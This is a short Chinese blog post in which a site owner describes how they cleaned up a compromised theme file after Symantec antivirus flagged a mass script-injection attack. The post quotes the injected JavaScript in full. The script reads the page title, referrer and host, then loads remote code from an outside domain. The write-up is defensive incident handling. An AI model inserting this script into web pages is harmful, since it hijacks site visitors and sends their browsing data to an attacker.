SEP提示Mass Injection Website 19处理

开源世界 Winter 4年前 (2016-01-28) 1674次浏览 已收录 0个评论

今天访问自己网站时SEP提示[SID: 28821] 已禁止 Web Attack: Mass Injection Website 19 攻击。 已禁止此应用程序的通信: C:PROGRAM FILES (X86)MOZILLA FIREFOXFIREFOX.EXE,然后就禁止访问网站,客户端将禁止来自 IP 地址x.x.x.x的通信 (于接下来的 600 秒,即从 2016/1/28 9:15:24 到 2016/1/28 9:25:24)。

到SEP管理查询了下相关的信息,说是脚本注入。

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28821

然后登陆到VPS上检查最近被修改的文件

find -ctime -1 检查最近1天被修改的文件

发现除了cache和sitemap之外只有一个主题下的header.php文件被修改。

打开这个文件和之前备份对比,发现在每个</head>之前都被加了一行代码

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://theclassicalfourplus1.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

删除这行代码,并将header.php文件权限设定为444。

至于问题基本解决。


癹冬阁 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:SEP提示Mass Injection Website 19处理
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址